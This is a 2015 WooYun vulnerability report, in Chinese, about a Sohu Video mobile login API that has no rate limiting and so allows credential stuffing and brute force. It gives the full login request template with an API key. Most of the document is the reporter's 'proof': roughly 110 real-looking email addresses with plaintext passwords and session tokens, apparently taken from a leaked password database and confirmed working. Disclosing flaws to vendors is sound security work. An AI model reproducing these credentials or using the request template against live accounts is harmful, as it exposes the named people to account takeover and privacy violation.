当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113460

漏洞标题:撞库之搜狐某"自由"接口缺陷(可爆破可撞库)

相关厂商:搜狐

漏洞作者: 小手冰凉

提交时间:2015-05-11 21:30

修复时间:2015-06-25 22:44

公开时间:2015-06-25 22:44

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-11: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

撞库之搜狐接口缺陷(可大量获取)

详细说明:

使用搜狐视频手机端登录并抓包,获得如下数据包

POST /v5/login.json HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: usr.mb.hd.sohu.com
Content-Length: 273
sys=android&mfov=M353&plat=6&mfo=htc&poid=1&api_key=9854b2afa779e1a6bff1962447a09dbd&pn=47&uid=c5f654e4f144cf78bd55ccf7a229b94c&sver=4.7.1&gid=02ffff10741110f04dc44d53db9af6a7471448fcfb2bef8&pwd=<md5加密密码>&sysver=4.1.1&partner=47&passport=<用户名>&


返回数据中带有token,然后后面进行操作时都会同时验证token。
使用cdsn库批量测试,没有提示错误次数多,没有接口使用次数多等任何提示.进一步测试发现这个接口也可以进行用户爆破。也是就是这是一个"自由"的接口,没有任何限制。

漏洞证明:

部分撞库结果:

hubdog@Chinaren.com:dog	token:41e11f7cfe9a4147d4e137853d0be66b
jiangtao@csdn.net:iscjt1103	token:f5cf2c6e56bf76ec9f20511d96b07910
brady007@chinaren.com:007026	token:13abd407957f4b98c3e5776aeec0bb3e
littletao@sina.com:wanderer	token:c583dffa6524bd3ca35a2af6b341c81b
huisheng@sohu.com:qiusuo	token:4ef31b8ed9b71b38c74e7376e0bfc399
childman@163.com:chudird	token:6730021babcde27448ecf6c219835d6a
peacelover@chinaren.com:74222315	token:53ab0ab8ebaf06a09dc31a8d95792bd3
wang2310@sohu.com:wang9237	token:7267a2253fc5c8c968b3be05d229f886
wshwzh@21cn.com:wsh168	token:c7b600999f95febedb9b2f7cac8d7189
lll3@sohu.com:lllllll	token:981ced79ce1069eb43cdc0828b8b1c03
lovingkane@chinaren.com:kanekane	token:ce4297f16b1ef7d69e70425eba92c940
gulizi@chinaren.com:197618	token:c9879de99fdf6cb3a6bcc5bb5d73ac0a
huoyunfei@hotmail.com:771111	token:182e3cacb43a26c88b9050b320ce0786
dxxfire@163.com:790926	token:d14bdfcafa1b3d09cb7031f8080b2a9c
ayaya2000@sina.com:ssyyww11	token:70a7670cec875d4f22037e7121ed8be2
aeolus_yao@21cn.com:yaoliwei	token:89b6f7c79a28399a743d1db77333df01
qezhu@sina.com:tan1978	token:fc9006742a2af59ccab5ab24332d41d0
pazen@chinaren.com:98103983	token:3eed53fcb12830af3cc3c963ba2be97f
nnwq@21cn.com:686640	token:7b27f7a953bb23e0aba141bbc9935b7b
lionandpuma@sohu.com:484715	token:209015a70047d6573aec7600ad9da0b4
fu_wei2000@chinaren.com:dragon2000	token:9ebeb3ce7a5ba131e86405ab9d014a56
kinghedq@163.com:mqqkctpgj	token:ad975b9d25800186ed0d5d672d125029
liujienick@chinaren.com:584131420	token:accc213f90b8f9d1d6b82f8a0173b7e5
wuzhen922@sohu.com:wz760722	token:b7bbf8d5307ebdee84e889ab06dbfe75
sy_ming@163.com:26560280	token:9ea9373d8045703065e6b513bf400366
colin517@sohu.com:woct1217	token:aaaab0cfc6fa8e2a8530e01db4b70136
meina2000@sohu.com:16596712	token:1943c8622e0b151173483eb27b642727
ariel_521@sina.com:woshitiancai	token:07c2538c81c77e67b3599487af7b9f98
enetwell@163.com:rs791004	token:1cff391ee088ebe0ec2d9a87059aa274
chenjing957@163.com:2885292	token:95319fd953a8a0fd401e982a8ad839e0
ustb-sumei@sohu.com:198111131020	token:6c76fb7a104b2affa7555f5df75dd2a1
wanglp094@sohu.com:19810511	token:4390f5f98b5bd40d13b7ea53657e0e52
ljb_9@163.com:lixiuduan	token:2e2cfefb6e63a146ddf2c9e2e0bd3d61
wengxq294@sohu.com:56509427	token:fcaf7f6c22fd161d677bca01ee286897
ynyangtao@21cn.com:12345678	token:d3eefcb010910e29199f6fdc76e0e6ae
gqfjob@gmail.com:66298713	token:4494eb9d69d33f85d2c52b915ff7426e
aiyan2001@sohu.com:19790501	token:5a7df5921f70c269610395d89ab64e6d
xy_589@126.com:x8182131y	token:f51ed6d9001d33f7252ff0b9ce9d5cd0
heyu-998@163.com:19821025hy	token:91290e559f782ac408f7790afb15e83f
simontala@163.com:19901981	token:6157e7987af85f8d72af7c412d2ccff0
940659881@qq.com:zw8112151	token:2bf36f271c53880c22c880c0a403a14b
csh2001@163.com:19840807	token:757b6814ef7f584d471c2e103835cd59
taofada11@sohu.com:74185288	token:0d77c67f87f78a38395f84e3eb4cb256
353822834@qq.com:136772060	token:ad711db9389e7dbae1634e9b41803ff2
zile@sohu.com:1218121878	token:8996046d295eb38a870b68498b7745ac
huajunun@163.com:19890807	token:62138802bf70f4a592788636cf8852a2
shuijingqiu_lyg@163.com:szdxdzxxxy27	token:da842aba4d963f84c456b52ba382ef43
qingshuiliu722@yahoo.com.cn:yalan128	token:43c21ac23fb4a6e1f95aed6a0a642ac4
kobron17@126.com:19841722	token:3e7f4a1ce4cf908524e419ae6bcef642
ylmjiang@yahoo.com.cn:y19779528	token:486422f156fc1b488062f7ff06bb872f
guzengyang@live.cn:209823236	token:730733f64baec399fccdb7909a25a62c
lovely1995@163.com:woaini1015	token:372670c57e907e40dc8f0160129148c4
575579791@qq.com:19861202	token:7de16a11f637acc65e8ffde6c998e930
304532576@qq.com:26362511	token:542deed019a5ea759373101ece7093d9
zhangyunfeizyf@126.com:759919888abcd	token:cbf6d2d2edbdcdb509643fe16c037625
hlightd@gmail.com:houdong135245	token:e0603f7a7cacb701554727260535a53a
156390513@qq.com:383854380	token:d3b88bce5e70ce871ad1fd2507998a62
lijun2006-8@163.com:ilovelijun23	token:4cea763de7b82dc6319b3144f64fe68f
zjw5001@tom.com:a4d22a9d	token:6d88852ae27f0b0c50c850ad7ec31024
yiming8814@hotmail.com:kingoffkings	token:af9dd80e6fc9bed0663bddaf90a68333
gangge1104@163.com:19831104	token:506cb272b7193819abc3777209ce3392
767278606@qq.com:19881027	token:e2a7b65b8ba01948fe83e0d5b51019a9
33553@163.com:y90139529	token:9cf12379cd943f22c63e1ae3d18e2e0f
kiofking0311@gmail.com:zhangkua	token:c6e4783f36772172588e9140a143e6bf
baixin069715@163.com:455149200	token:f45ba49e531379c154bd0d7c7d076814
heng19861229@163.com:heng1025	token:7eac5bd3706ff2bf78b472fa7d04d372
416277460@qq.com:ccrr19880827	token:4db6310ebf70e0d4ce8128b562c00f42
xieyaming163@yahoo.cn:32900991	token:5ae718cf17db4d1ad7ca1d37d3067e22
50647489@QQ.com:13822905650	token:14b2072cadf70c10979c88bc262872a7
xc19820719@163.com:820719123	token:90b037ee6b15b0d156f0fc7b0e90bc9b
zhrui2008@sohu.com:asdfhogi	token:a10c83a9a71f2c34d962115605f0f678
xyzxyy@sohu.com:13050642130	token:8d87dfeb25f8c75f877aa9bcf21db786
wjn820919@yahoo.com.cn:weidao1010	token:613d298bd70b1fa8e82410fb1dcf0b8d
rain19890502@126.com:19890502asdfg110	token:1308120f9b5a4033a2f3574967af1093
chenshiqiang2010@126.com:19870705	token:dec55d83d0b1d809240892a6309b833b
wgejydyzpc@sohu.com:123456789	token:8084ad1b0f8fbd9a7c030159e4250484
916613618@qq.com:513148977	token:aeb588b85e2a173b3065d02d40cdb276
uyzhb@163.com:uyzhb19871023	token:038ec6b838386fb22758b3499a032636
583667064@qq.com:lhys5211	token:459fbcc01224f99151a9958ba4d78af6
wsm880506@sohu.com:13709021109	token:30ef000f30df077752c1c9b0509af3f9
chenghaiwei000@126.com:200631040080	token:03a619107f237e8ae842be32d02e977e
mxtshengjie@163.com:mxt583341	token:2e1421fdeae272765b6b7208c947cb21
fgchg-911@163.com:119vs911	token:213c1808aea3124510cabdccb836bd03
liangliang1989711@126.com:363694836	token:736862004774efc854f14a464748a4fb
363555546@qq.com:yanhan9155	token:a9284b577db8c8ed745aff1de31f6381
yhzxjb@126.com:hxm8053238	token:2c36b6ef32bc7d840a36953b44691715
yj-2004-1-17@163.com:abcd951753	token:401fb5dc4f83624d0d0048c61cb529a7
191172331@qq.com:831122qaz	token:9cb7fdcb7c9a7669a3f48215ab3c69a5
bruce0com0cn@hotmail.com:11556688	token:9156e5bdeadee6f849d741b5c6cf243c
lanhuanggui@163.com:wings112	token:1fbcda56f2e693caa1c7d6cdef67a2d6
shjy.nicholas@gmail.com:shiqin520	token:0622533895907d628d917a72eb468326
utempfwcw@126.com:utempfiwcw	token:e865d18ef84a5fecfed481c96e97ecd3
147324943@qq.com:sofa2008	token:78fc5ecf8770fd0394d016d95318efe4
liu.xingyu@163.com:198911198	token:975a7f6e07c0670054428b057b67e061
523489309@qq.com:kaaiqkwmmo	token:53470aaca7cb1847c0295e9cee4427d7
XJL13530713993@163.com:80908090	token:345abdaf78da723109353cecf81939ff
youpp@126.com:304154554	token:7679cab19c7f22bd3f42125a3c334318
always.enjoy@163.com:joy2251131	token:530884879ccefc3015d135c5c20dfa2e
jimmywells@126.com:2102135211	token:776252a24b0610bc8c5a3f9b3dc9d88d
362103921@qq.com:19880602	token:a8bbd9a869368d5644ed00db2adb1b0d
kevin_h_xu@hotmail.com:xujin1028	token:5b2a7309c9b0edf079455fdfd1cc63f5
carahua@sina.com:23758ha961	token:2c1681cca5e8b4c3772938a29f38626b
chl1041@163.com:97104104	token:365bf94a1a35e4e51653ea15f9131e54
348544218@qq.com:liuxiao1991	token:3cd72f9bfb83f327461a4b4e5019a03c
369756826@qq.com:6967446sky	token:06bd07a9eb5cb61056df9636293d2fa2
zcwkw@163.com:19851207	token:5c180bb9909717a71429225cb1f50ae4
jianzhu12345628@sohu.com:hwx123456	token:572e7e596c0248b8fdb3e52e3fcfd65e
sunowners@163.com:13137871860	token:109a3abf7de70ba45191cab05c5daf3c
hulaxm@163.com:64686305	token:386bb506ca0e65ae513831ee03aca18c
sharptogether132@sohu.com:a1s2d3f4	token:feff3d2ed4c9d82cf49abeec8f2aa7a7
794997913@qq.com:limuyang	token:0044831aeeec226948fb7520be03d7a4
pilipaca@126.com:85798579	token:ae6e7762d44cdc45b28cdfb01b832f6f

修复方案:

对接口的使用进行ip或者次数的限制

版权声明:转载请注明来源 小手冰凉@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-05-11 22:43

厂商回复:

感谢支持。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-11 22:06 | 小手冰凉 ( 普通白帽子 | Rank:174 漏洞数:18 | 幸福你我他)

    @xsser 求打下码